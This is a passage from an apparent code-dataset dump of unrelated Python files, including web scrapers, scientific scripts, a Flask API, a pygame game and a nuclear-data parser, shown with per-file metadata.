wx.Sound(sound_file)\n        # sound.IsOk(wx.SOUND_ASYNC)\n        sound.Play(wx.SOUND_ASYNC)\n\n    def onStopSound(self, event):\n        wx.Sound.Stop()\n\n    def onExit(self, event):\n        self.Destroy()\n        wx.Sound.Stop()\n\n    def OnClick(self, event):\n        wx.Sound.Stop()\n        self.Close()\n\nif __name__ == '__main__':\n    app = wx.PySimpleApp()\n    frame = MainWindow(parent=None, id=-1)\n    app.MainLoop()","sub_path":"all_functions/linux server/python GUI/Grid_on_photo/bottun_imgae.py","file_name":"bottun_imgae.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182093128","text":"import re\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import Selector\n\nfrom hermes.items import EbayItem\n\nID_RE = re.compile(r\"http://www.ebay.com/itm/[^/]+/(\\d+)\")\nPRICE_XPATH = r\"//span[@id='prcIsum']/text()\"\nTITLE_XPATH = r\"//h1[@id='itemTitle']/text()\"\n\nclass EbaySpider(CrawlSpider):\n    name = \"ebay\"\n    allowed_domains = [\"ebay.com\"]\n    start_urls = [\"http://deals.ebay.com/tech-deals\"]\n    ebay_deals_url = r\"http://deals.ebay.com/[^/]+$\"\n    deal_url = r\"http://www.ebay.com/itm/[^/]+/(\\d+)\"\n    rules = (\n        # follow the deals listing pages (no callback, link extraction only)\n        Rule(SgmlLinkExtractor(allow=(ebay_deals_url, ))),\n\n        # scrape each individual deal url\n        Rule(SgmlLinkExtractor(allow=(deal_url, )), callback=\"parse_page\"),\n    )\n\n    def parse_page(self, response):\n        sel = Selector(response)\n        item = EbayItem()\n\n        item['url'] = str(response.url)\n        title = sel.xpath(TITLE_XPATH).extract()[0].strip()\n        item['title'] = title\n        item['tags'] = [x.lower() for x in re.split('\\W+', title)]\n        item['price'] = sel.xpath(PRICE_XPATH).extract()[0].strip()\n        if ID_RE.match(response.url):\n            item['id'] = ID_RE.match(response.url).group(1)\n        return item\n","sub_path":"hermes/spiders/ebaydeals.py","file_name":"ebaydeals.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602711294","text":"import urllib.request\nimport re\nfrom bs4 import BeautifulSoup\n\ndef main():\n    url='https://baike.baidu.com/item/%E7%8C%AA%E5%85%AB%E6%88%92/769'\n    response=urllib.request.urlopen(url)\n    html=response.read()\n    soup=BeautifulSoup(html,'html.parser')\n    for each in soup.find_all(href=re.compile('view')):\n        print(each.text, '->', ''.join([\"http://baike.baidu.com\", each[\"href\"]]))\n\nif __name__ == \"__main__\":\n    main()","sub_path":"web_spider/P_20180709_beautifulSoup.py","file_name":"P_20180709_beautifulSoup.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326409839","text":"#!/usr/bin/env python\n#LDAU = .TRUE.\n#LDAUTYPE = 2 !
Dudarev's Approach\n#LDAUL = 2 -1\n#LDAUU = 4.0 0\n#LDAUJ = 1 0\nimport sys;\nif len(sys.argv) < 4 or len(sys.argv)%2 != 0:\n print(\"Usage: python make_dft+u_incar.py POSCAR ele1 U_for_ele_1 [ele2 U_for_ele_2,...]\");\n exit()\n\nelement_wU = [];\nelement_Us = [];\n\nfor i in range(2,len(sys.argv)):\n if(i%2==0):\n element_wU.append(sys.argv[i]);\n element_Us.append(sys.argv[i+1]);\n\nLDAULline = \"LDAUL = \";\nLDAUUline = \"LDAUU = \";\nLDAUJline = \"LDAUJ = \";\n\ntry:\n poscar = open(sys.argv[1],'r');\n elements = poscar.readline().strip().split();\n for i in elements:\n if i in element_wU:\n pos = element_wU.index(i);\n LDAULline += str(\"2 \");\n LDAUUline += str(element_Us[pos]+\" \");\n else:\n LDAULline += str(\"-1 \");\n LDAUUline += str(\"0.0 \");\n LDAUJline += \"0.0 \";\nexcept IOError:\n print(\"Can't open poscar file \"+sys.argv[1]);\n exit();\n\nprint(\"LDAU = .TRUE.\");\nprint(\"LDAUTYPE = 2 ! Dudarev's Approach\");\nprint(LDAULline);\nprint(LDAUUline);\nprint(LDAUJline);\n","sub_path":"make_dft+u_incar.py","file_name":"make_dft+u_incar.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43640524","text":"# Author: Hanzi Mao \n#\n# License: BSD 3 clause\n\nfrom . import select_area, get_lat_lon, match_lat_lon\n\nfrom netCDF4 import Dataset\n\n\ndef subset_usa(in_file, lat1, lat2, lon1, lon2, var_lis, out_file):\n fh_in = Dataset(in_file, \"r\")\n fh_out = Dataset(out_file, \"w\")\n\n lat_indices, lon_indices = select_area(lat1, lat2, lon1, lon2, \"M03\")\n lats, lons = get_lat_lon(\"M03\")\n lats = lats[lat_indices[0]: lat_indices[1]]\n lons = lons[lon_indices[0]: lon_indices[1]]\n\n i_lat_start, i_lat_end, i_lon_start, i_lon_end = match_lat_lon(fh_in.variables[\"lat\"][:],\n fh_in.variables[\"lon\"][:],\n lats,\n lons)\n\n fh_out.createDimension('lat', len(lats))\n fh_out.createDimension('lon', len(lons))\n\n outVar = fh_out.createVariable('lat', 'f4', ('lat'))\n outVar.setncatts({\"units\": \"degree_north\"})\n outVar[:] = lats[:]\n outVar = fh_out.createVariable('lon', 'f4', ('lon'))\n outVar.setncatts({\"units\": \"degree_east\"})\n outVar[:] = lons[:]\n\n for v_name, varin in fh_in.variables.items():\n if v_name in var_lis:\n outVar = fh_out.createVariable(v_name, varin.datatype, varin.dimensions)\n outVar.setncatts({k: varin.getncattr(k) for k in varin.ncattrs()})\n outVar[:] = varin[i_lat_start: i_lat_end + 1, i_lon_start: i_lon_end + 1]\n\n fh_out.close()\n\n","sub_path":"data_preprocessing/utils/subset_usa.py","file_name":"subset_usa.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210660315","text":"\n\n#calss header\nclass _VANISH():\n\tdef __init__(self,): \n\t\tself.name = \"VANISH\"\n\t\tself.definitions = [u'to disappear or stop being present or existing, especially in a sudden, surprising way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_vanish.py","file_name":"_vanish.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66784534","text":"#!/usr/bin/env python3\n# filename: analyzer_breeder.py\n\nimport os\nimport cv2\nimport data_loader as dl\nimport analyzers_2_categories as 
a2c\nfrom sklearn.model_selection import KFold\nimport model_evaluation as m_eval\nimport eval_figures as eval_figs\nimport datetime\nimport timer\nimport pickle\n\n\ndef main():\n start_time = datetime.datetime.now()\n\n #############\n # Load Data #\n #############\n\n data_root = '../input-data/'\n #data_category = '1-pre-processed'\n data_category = '2-processed'\n data_base = data_root + data_category + '/'\n # A: 138062 images. Full data set in original file structure.\n #data_path = data_base+'A'\n #data_name = 'data_A'\n #data_short_name = 'A'\n # B: 26 images.\n data_path = data_base+'B'\n data_name = 'data_B'\n data_short_name = 'B'\n # C: 200 images. (Abnormal=Blood)\n #data_path = data_base+'C'\n #data_name = 'data_C'\n #data_short_name = 'C'\n # D: 2000 images.\n #data_path = data_base+'D'\n #data_name = 'data_D'\n #data_short_name = 'D'\n # E: 10000 images.\n #data_path = data_base+'E'\n #data_name = 'data_E'\n #data_short_name = 'E'\n # F: 138062 images. Full data (minus vids) set in modified file structure.\n #data_path = data_base+'F'\n #data_name = 'data_F'\n #data_short_name = 'F'\n\n # Load:\n class_split = 'by_abnorm'\n #class_split = 'by_region'\n train_set, train_files, train_labels, \\\n test_set, test_files \\\n = dl.load_data_2class_abnormality(data_path)\n # = dl.load_data_4class_region(data_path)\n\n\n ####################\n # Find Input Shape #\n ####################\n\n # Take sample image\n img = cv2.imread(train_set.iloc[0][0])\n\n img_height = img.shape[0]\n img_width = img.shape[1]\n img_channels = img.shape[2]\n img_shape = (img_height, img_width, img_channels)\n img_size = (img_height, img_width)\n\n # Any images that do not have this size will be cropped.\n # See source of train_model().\n # (What about if they're too small?)\n\n\n ##################\n # Breed Analyzer #\n ##################\n\n # Initialize model\n model, model_short_name, base_model_name \\\n = a2c.mobilenet_v2_a(img_shape) # without \"fine-tuning\"\n # Options:\n # = a2c.mobilenet_v2_a(img_shape) # without \"fine-tuning\"\n # = a2c.mobilenet_v2_b(img_shape) # with shallow \"fine-tuning\"\n # = a2c.mobilenet_v2_c(img_shape) # with deep \"fine-tuning\"\n # = a2c.mobilenet_v2_d(img_shape) # with deep \"fine-tuning\"\n # = a2c.xception_a(img_shape) # without \"fine-tuning\"\n # = a2c.xception_b(img_shape) # with shallow \"fine-tuning\"\n\n # Output location\n #output_root = '../output/test/train/'\n #output_root = '../output/cpu/train/'\n output_root = '../output/train/'\n output_base = output_root + f'{model_short_name}/' + \\\n f'{data_category}/{class_split}/{data_name}/'\n\n # Prepare for training\n batch_size = 2 # B\n #batch_size = 4 # C\n #batch_size = 20 # D (mobilenet)\n #batch_size = 10 # D (xception) #Got error (fixed by reducing to 10)\n #batch_size = 10 #E (mobilenet) #Got error at 40, reducing to 10\n #batch_size = 100 # F\n epochs = 50\n n_fold = 4 # B,C (MNv2d E, D run 2+; MNv2a E run 2+)\n #n_fold = 5 # D,E,F\n histories = []\n\n # Find this run's number (\"train-and-test run #..\")\n run = 1\n while os.path.isfile(output_base +\n f'Run_{run:02d}/duration_total_breeder.txt'):\n run += 1\n run_path = output_base + f'Run_{run:02d}/'\n\n os.makedirs(run_path, exist_ok=True)\n file = open(run_path+f'train_params.txt', 'w')\n file.write(f'batch_size = {batch_size}\\n' +\n f'epochs = {epochs}\\n' +\n f'n_fold = {n_fold}\\n')\n file.close()\n\n kf = KFold(n_splits=n_fold, shuffle=True)\n\n # Train model: compile (configure for training), train, test, save (& time)\n 
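    # a2c.train_model (defined in analyzers_2_categories, not shown here)\n    # presumably drives the KFold loop itself, returning one training history\n    # per fold plus predictions for the held-out test files.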
tnt_start_time = datetime.datetime.now()\n histories, test_pred = a2c.train_model(model, batch_size, epochs, img_size,\n train_set, train_labels, test_files,\n n_fold, kf, run_path, run)\n tnt_end_time = datetime.datetime.now()\n\n print('Now recording train-and-test durations.')\n # Total:\n description = 'Run train-and-test time (duration)'\n filepath1 = run_path + f'duration_train_and_test.txt'\n tnt_elapsed = tnt_end_time - tnt_start_time\n tnt_tot_sec = timer.record_duration(tnt_elapsed, description, filepath1)\n # Per image:\n description = 'Run train-and-test time (average duration per image)'\n filepath2 = run_path + f'duration_train_and_test_per_img.txt'\n tot_num_imgs = len(train_set) + len(test_set)\n tnt_elapsed_per_img = tnt_tot_sec / tot_num_imgs\n tnt_imgs_per_sec = tot_num_imgs / tnt_tot_sec\n file = open(filepath2, 'w')\n file.write(f'{description}\\n = ' +\n f'({tnt_tot_sec} seconds) / ({tot_num_imgs} images)\\n = ' +\n f'{tnt_elapsed_per_img} seconds/image.' +\n f'\\n\\n' +\n f'({tot_num_imgs} images) / ({tnt_tot_sec} seconds)\\n = ' +\n f'{tnt_imgs_per_sec} images/second.\\n')\n file.close()\n\n\n #############################\n # Save/Generate More Output #\n #############################\n\n print('Now saving training output and histories.')\n run_results_path = run_path + f'results/'\n os.makedirs(run_results_path, exist_ok=True)\n # output:\n test_set['abnormality_pred'] = test_pred\n run_results_file_path = run_results_path + \\\n f'output_scores.csv'\n test_set.to_csv(run_results_file_path, index=None)\n # histories:\n run_histories_path = run_path + f'histories/'\n run_histories_file_path = run_histories_path + \\\n f'histories_Run_{run:02d}.pckl'\n os.makedirs(run_histories_path, exist_ok=True)\n f = open(run_histories_file_path, 'wb')\n pickle.dump(histories, f)\n f.close()\n\n print('Now generating and saving evaluations and figures.')\n eval_path = run_path + f'evaluations/'\n eval_fig_path = eval_path + f'figures/'\n os.makedirs(eval_fig_path, exist_ok=True)\n # histories\n plot_run_name = model_short_name + data_short_name + 'r' + str(run)\n eval_figs.make_acc_loss_plots(histories, eval_fig_path, plot_run_name)\n # ROC fig\n eval_figs.make_roc_plot(test_set, eval_fig_path, plot_run_name)\n # evaluations data\n # (precision/recall, sensitivity/specificity, ROC/thresholds, etc)\n test_w_reckoning_choices, evaluations \\\n = m_eval.make_eval_data(test_set, eval_path, plot_run_name)\n # thresh, CM fig, and reckonings\n eval_figs.pick_thresh_make_figures(evaluations, test_w_reckoning_choices,\n eval_path, eval_fig_path, plot_run_name)\n # (could show points on ROC curve for chosen threshold(s))\n\n print('Now recording total breeder duration.')\n end_time = datetime.datetime.now()\n elapsed = end_time - start_time\n description = 'Total breeder (train-test-evaluate-etc) time (duration)'\n filepath3 = run_path + f'duration_total_breeder.txt'\n timer.record_duration(elapsed, description, filepath3)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"ai_vision_for_endoscopy/analyzer_breeder.py","file_name":"analyzer_breeder.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"648572735","text":"# -*- coding=UTF-8 -*-\n# pyright: strict, reportTypeCommentUsage=none\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nTYPE_CHECKING = False\nif TYPE_CHECKING:\n from typing import Any, Text, Optional, Callable, TypeVar, ParamSpec\n\n 
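    # typing-only aliases: T stands for the wrapped function's return type and\n    # P for its parameter spec, letting the decorator re-type f(...) -> T as\n    # f(...) -> Thread without losing the argument signature.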
T = TypeVar(\"T\")\n P = ParamSpec(\"P\")\n\nfrom threading import Thread\nfrom functools import wraps\n\n\ndef run_in_thread(\n name=None,\n daemon=None,\n):\n # type: (Optional[Text], Optional[bool]) -> Callable[[Callable[P, T]], Callable[P, Thread]]\n \"\"\"Run func in thread.\"\"\"\n\n def outer(f):\n # type: (Callable[P, T]) -> Callable[P, Thread]\n\n @wraps(f)\n def inner(*args, **kwargs):\n # type: (Any, Any) -> Thread\n thread = Thread(\n target=f,\n name=name,\n args=args,\n kwargs=kwargs,\n )\n if daemon:\n thread.daemon = True\n thread.start()\n return thread\n\n return inner # type: ignore\n\n return outer\n","sub_path":"wulifang/_util/_run_in_thread.py","file_name":"_run_in_thread.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96813307","text":"import sys\nimport os\nimport random\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc, rcParams\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter\nimport numpy as np\nfrom math import *\nfrom time import time\nimport random\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column \nfrom scipy import interpolate\n\n\n\n\ndef myM2L_(L_k, alfa):\n \n \n L = L_k / 1.E10\n if L>=1: \n return 32.*(L**0.15)\n else:\n return 32.*(L**alfa)\n \ndef myM2L__(alfa):\n \n L_lst = [1.E13, 4.423E10, 9E8, 1.E7]\n M2L_lst = [myM2L_(1.E13, alfa), myM2L_(4.423E10, alfa), myM2L_(9E8, alfa), myM2L_(1.E7, alfa)]\n \n L_lst = np.asarray(L_lst)\n M2L_lst = np.asarray(M2L_lst)\n \n myM2L = interpolate.interp1d(np.log10(L_lst), np.log10(M2L_lst))\n \n return myM2L \n\n\n\ndef L_exp(M, alfa, beta, gama):\n \n M12 = M/1.E12\n \n log10L = log10(alfa) + 10. + beta*log10(M12) + (gama/M12)*log10(exp(1.))\n \n return 10**log10L\n\n\ndef M_exp_f(alfa, beta, gama):\n \n Lbin = np.logspace(7,13,1000)\n Mbin = np.logspace(10,20,1000) \n \n for i in range(len(Mbin)): Lbin[i] = L_exp(Mbin[i], alfa, beta, gama)\n \n M_f = interpolate.interp1d(np.log10(Lbin), np.log10(Mbin))\n \n return M_f\n\n\n#################################################################\n\nif __name__ == '__main__':\n \n fig = plt.figure(figsize=(45/7., 6), dpi=100)\n #ax = fig.add_axes([0.13, 0.1, 0.83, 0.85]) # m-L relation\n ax = fig.add_axes([0.15, 0.13, 0.80, 0.80]) \n \n \n Lbin = np.logspace(7,13,50)\n Mbin = np.logspace(10,15,50)\n \n f = myM2L__(-0.9393)\n for i in range(len(Lbin)): Mbin[i] = 10**f(np.log10(Lbin[i]))*Lbin[i]\n ax.plot(Mbin,Lbin, 'b.') \n \n \n f = myM2L__(-0.5)\n for i in range(len(Lbin)): Mbin[i] = 10**f(np.log10(Lbin[i]))*Lbin[i]\n ax.plot(Mbin,Lbin, 'r-') \n \n \n #alfa = 3.7043 \n #beta = 0.8827 \n #gama = -0.4347\n alfa = 4.0 \n beta = 0.82 \n gama = -0.42 \n \n M_f = M_exp_f(alfa, beta, gama)\n for i in range(len(Lbin)): Mbin[i] = 10**M_f(log10(Lbin[i]))\n ax.plot(Mbin,Lbin, 'g-') \n \n \n alfa = 3.25 \n beta = 0.59\n gama = -0.6\n M_f = M_exp_f(alfa, beta, gama)\n for i in range(len(Lbin)): Mbin[i] = 10**M_f(log10(Lbin[i]))\n ax.plot(Mbin,Lbin, '--', color='black') \n \n \n #alfa = 4.0 \n #beta = 0.82 \n #gama = -0.42 \n #M_f = M_exp_f(alfa, beta, gama)\n #for i in range(len(Lbin)): Mbin[i] = 10**M_f(log10(Lbin[i]))\n #ax.plot(Mbin,Lbin, 'g--') \n \n \n\n ax.set_xlabel('M'+r'$_v$'+' ['+r'$M_\\odot$'+']', fontsize=16)\n ax.set_ylabel('K'+r'$_s$'+'-band Luminosity ['+r'$L_\\odot$'+']', fontsize=16)\n \n #plt.minorticks_on()\n plt.tick_params(which='major', length=7, width=1.5)\n plt.tick_params(which='minor', length=4, 
color='#000033', width=1.0) \n\n plt.yticks(fontsize=16)\n plt.xticks(fontsize=16)\n\n ##ax.annotate(r'$L^{-0.5}$', (3.E7, 141), rotation=0, color='black', size=18)\n #ax.annotate(r'$L^{0.15}$', (4.5E11, 35), rotation=0, color='black', size=18)\n \n #ax.annotate(r'$L^{-0.7}$', (2.E8, 800), rotation=0, color='blue', size=18)\n\n plt.xscale('log')\n plt.yscale('log')\n plt.xlim(1.E10,2.E15)\n plt.ylim(5.E7,1.E13)\n\n \n \n \n plt.show()\n","sub_path":"Lumin_va_Mass.py","file_name":"Lumin_va_Mass.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330118476","text":"# IMPORTS\r\n\r\nimport os\r\n\r\nfrom tinydb import TinyDB, Query\r\n\r\nfrom flask import Flask, g, render_template, jsonify, request\r\n\r\napp = Flask(__name__)\r\n\r\n# DATABASE\r\n\r\ndb = TinyDB('db.json')\r\n\r\nbathrooms = db.table('bathrooms')\r\n\r\n# API ROUTES\r\n\r\n@app.route('/api/v1/bathrooms')\r\ndef get_bathrooms():\r\n \r\n # parameters\r\n \r\n search_area_start_lat = request.args.get('search_area_start_lat')\r\n search_area_start_lng = request.args.get('search_area_start_lng')\r\n search_area_end_lat = request.args.get('search_area_end_lat')\r\n search_area_end_lng = request.args.get('search_area_end_lng')\r\n gendering = request.args.get('gendering')\r\n accessibility = request.args.get('accessibility')\r\n venue_type = request.args.get('venue_type')\r\n \r\n if (search_area_start_lat is not None and search_area_start_lng is not None and search_area_end_lat is not None and search_area_end_lng is not None):\r\n \r\n # fetch results from location\r\n \r\n Bathroom = Query()\r\n \r\n if (gendering is not None):\r\n results = bathrooms.search((Bathroom.geometry.lat < float(search_area_start_lat)) & (Bathroom.geometry.lat > float(search_area_end_lat)) & (Bathroom.geometry.lng < float(search_area_start_lng)) & (Bathroom.geometry.lng > float(search_area_end_lng)) & ((Bathroom.properties.accessibleType==\"unisex\") | (Bathroom.properties.type==\"unisex\") | (Bathroom.properties.bathroom_gendering==\"gender neutral\")))\r\n else:\r\n results = bathrooms.search((Bathroom.geometry.lat < float(search_area_start_lat)) & (Bathroom.geometry.lat > float(search_area_end_lat)) & (Bathroom.geometry.lng < float(search_area_start_lng)) & (Bathroom.geometry.lng > float(search_area_end_lng)))\r\n\r\n return jsonify(results)\r\n\r\n else:\r\n return \"ERROR: search_area_start_lat, search_area_start_lng, search_area_end_lat and search_area_end_lng are required\"\r\n\r\n@app.route('/api/v1/bathroom')\r\ndef get_bathroom():\r\n \r\n # parameters\r\n \r\n bathroom_id = request.args.get('bathroom_id')\r\n \r\n if (bathroom_id is not None):\r\n \r\n # fetch record\r\n\r\n results = bathrooms.get(eid=bathroom_id)\r\n\r\n return jsonify(results)\r\n \r\n else:\r\n return \"ERROR: bathroom_id is required\"\r\n\r\n# USER FACING ROUTES\r\n\r\n@app.route('/')\r\ndef main_page():\r\n \r\n \r\n return render_template('index.html')\r\n \r\n# RUN APP\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281362078","text":"from Colors import *\nimport random\nimport pygame\nimport time\nimport os\npygame.init()\n\nscreen_width = 1200\nscreen_height = 700\nfps = 50\nx = True\nrep = None\nscore = 0\nenemy_attr = []\nmusic = {}\n\nimages = (\n 
pygame.image.load(\"images/bgb.png\"),\n random.choice([pygame.image.load(\"images/ship.png\"), pygame.image.load(\"images/ship1.png\")]),\n pygame.image.load(\"images/bullet.png\"),\n pygame.image.load(\"images/none.png\"),\n random.choice([pygame.image.load(\"images/corona1.png\"),\n pygame.image.load(\"images/corona3.png\"), pygame.image.load(\"images/corona4.png\"),\n pygame.image.load(\"images/corona5.png\"), pygame.image.load(\"images/corona6.png\")]),\n pygame.image.load(\"images/start.png\"),\n pygame.image.load(\"images/start1.jpg\")\n)\n\nmusic['start'] = pygame.mixer.Sound(\"music/start.wav\")\nmusic['bg'] = pygame.mixer.Sound(\"music/bg.wav\")\nmusic['fire'] = pygame.mixer.Sound(\"music/fire.wav\")\nmusic['blast'] = pygame.mixer.Sound(\"music/blast.wav\")\n\nship = pygame.transform.scale(pygame.transform.rotate(images[1], 270), (65, 65))\nship_x = (screen_width / 9)\nship_y = (screen_height - ship.get_height()) / 2\n\nbullet_list = []\nfired = []\n\npos = []\n\ngameWindow = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"GoCorona - by Om Londhe\")\nclock = pygame.time.Clock()\n\n\ndef enemy():\n enemy_x = random.randrange(10, screen_width - 21)\n enemy_y = random.randrange(65, (screen_height - 65))\n img = images[4]\n pos.append([img, enemy_x, enemy_y])\n return pos\n\n\ndef fire():\n bullet = pygame.transform.scale(pygame.transform.rotate(images[2], 45), (75, 75))\n bullet_x = ship_x\n bullet_y = ship_y + (ship.get_height() - ship.get_height() - 4.5)\n bullet_velocity = 25\n bullet_list.append([bullet, bullet_x, bullet_y, bullet_velocity])\n return bullet_list\n\n\ndef check_collision():\n global score\n for i in fired:\n for j in enemy_attr:\n if (abs(j[2] - i[2]) < 15) and (abs(j[2] - i[2]) > 0) and (abs(j[1] < i[1])) and \\\n (abs(j[1] - i[1]) > 0):\n score = score + 1\n music['blast'].play()\n enemy_attr.remove(j)\n fired.remove(i)\n\n\ndef show_text(text, color, x, y):\n txt = font.render(text, True, color)\n gameWindow.blit(txt, (x, y))\n\n\nif not os.path.exists(\"hs.txt\"):\n with open(\"hs.txt\", 'w') as hs:\n hs.write(\"0\")\n\nwith open(\"hs.txt\", 'r') as hs:\n h_score = hs.read()\n\n\nfont = pygame.font.SysFont(None, 51)\nexit_game = False\n\n\ndef start():\n music['start'].play()\n global exit_game\n while not exit_game:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.KEYDOWN or (event.type == pygame.MOUSEBUTTONDOWN):\n mainloop()\n gameWindow.blit(pygame.transform.scale(images[0], (screen_width, screen_height)).convert_alpha(), (0, 0))\n gameWindow.blit(ship, (ship_x, ship_y))\n gameWindow.blit(images[5], (700, 0))\n gameWindow.blit(pygame.transform.scale(images[6], (250, 250)).convert_alpha(), (0, 0))\n start_font = pygame.font.SysFont(None, 75)\n start_text = start_font.render(\"Press Any Key to Stop Coronavirus !!!\", True,\n random.choice([white, black, brown, yellow, green, red, orange, purple]))\n gameWindow.blit(start_text, (150, 500))\n pygame.display.update()\n clock.tick(fps)\n\n pygame.quit()\n quit()\n\n\ndef mainloop():\n music['bg'].play()\n global ship_x, ship_y, fired, h_score, rep, enemy_attr, exit_game\n enemy_attr = enemy()\n difficulty = 5\n\n while not exit_game:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == pygame.BUTTON_LEFT:\n fired = fire()\n music['fire'].play()\n\n key_hold = pygame.key.get_pressed()\n if key_hold[pygame.K_UP] or 
key_hold[pygame.K_w]:\n if not ship_y <= 60:\n ship_y = ship_y - 9\n if key_hold[pygame.K_DOWN] or key_hold[pygame.K_s]:\n if not ship_y >= screen_height - 80:\n ship_y = ship_y + 9\n if key_hold[pygame.K_a] or key_hold[pygame.K_LEFT]:\n if not ship_x <= 10:\n ship_x = ship_x - 9\n if key_hold[pygame.K_d] or key_hold[pygame.K_RIGHT]:\n if not ship_x >= (screen_width - ship.get_width() - 10):\n ship_x = ship_x + 9\n\n gameWindow.blit(pygame.transform.scale(images[0], (screen_width, screen_height)).convert_alpha(), (0, 0))\n for bullet in fired:\n bullet[1] = bullet[1] + bullet[3]\n gameWindow.blit(bullet[0], (bullet[1], bullet[2]))\n check_collision()\n if bullet[1] >= screen_width:\n fired.remove(bullet)\n gameWindow.blit(ship, (ship_x, ship_y))\n\n for enemy_details in enemy_attr:\n gameWindow.blit(pygame.transform.scale(enemy_details[0], (60, 60)), (enemy_details[1], enemy_details[2]))\n if enemy_details[1] < -65:\n enemy_attr.remove(enemy_details)\n\n timer = time.clock()\n if int(timer % difficulty) == 0 and (rep != int(timer)):\n enemy_attr = enemy()\n for enemy_details in enemy_attr:\n gameWindow.blit(pygame.transform.scale(enemy_details[0], (60, 60)), (enemy_details[1], enemy_details[2]))\n rep = int(timer)\n\n if int(timer % 75) == 0 and int(timer) != 0 and difficulty != 1:\n difficulty = random.randrange(1, 5)\n\n if int(h_score) <= score:\n h_score = score\n with open(\"hs.txt\", 'w') as hs:\n hs.write(str(h_score))\n\n show_text(f\"Score: {score}\", white, 5, 5)\n show_text(f\"High-Score {h_score}\", white, 900, 5)\n pygame.display.update()\n clock.tick(fps)\n\n pygame.quit()\n quit()\n\n\nstart()\n","sub_path":"GoCorona/prev.py","file_name":"prev.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"64902710","text":"import datetime\n\nfrom models.transfer import Transfer\nfrom models.application import Application\n\nactive_transfers = 0.0\ntotal_transfers = 0.0\ntoday = datetime.date.today()\n\nfor transfer in Transfer.all():\n if transfer.start_date <= today:\n total_transfers += sum(transfer.monthly_transfers)\n \napp = Application.app()\napp.total_transfers = total_transfers\napp.put()","sub_path":"tasks/transfers.py","file_name":"transfers.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261675191","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 11 15:08:25 2018\n\n@author: fiorito_l\n\"\"\"\nimport logging\nfrom functools import reduce\n\nimport pandas as pd\nimport numpy as np\n\nfrom .utils import BaseFile, Xs\nfrom ..settings import SandyError\n\n__author__ = \"Luca Fiorito\"\n__all__ = [\"Errorr\"]\n\nclass Errorr(BaseFile):\n\n Format = \"errorr\"\n\n def read_section(self, mat, mf, mt):\n \"\"\"\n Parse MAT/MF/MT section\n \"\"\"\n if mf == 1:\n from .mf1 import read_errorr as read\n elif mf == 3:\n from .mf3 import read_errorr as read\n elif mf == 33 or mf == 31 or mf == 35:\n from .mf33 import read_errorr as read\n else:\n raise SandyError(\"SANDY cannot parse section MAT{}/MF{}/MT{}\".format(mat,mf,mt))\n if (mat,mf,mt) not in self.index:\n raise SandyError(\"section MAT{}/MF{}/MT{} is not in tape\".format(mat,mf,mt))\n return read(self.loc[mat,mf,mt].TEXT)\n\n def get_xs(self, listmat=None, listmt=None, **kwargs):\n \"\"\"\n Extract xs from errorr file into Xs instance.\n \"\"\"\n condition = self.index.get_level_values(\"MF\") == 3\n tape = self[condition]\n 
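        # the MF == 3 mask above keeps only cross-section sections; the optional\n        # filters below OR together one boolean mask per requested value, e.g. a\n        # hypothetical listmat=[125, 2631] keeps rows whose MAT matches either.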
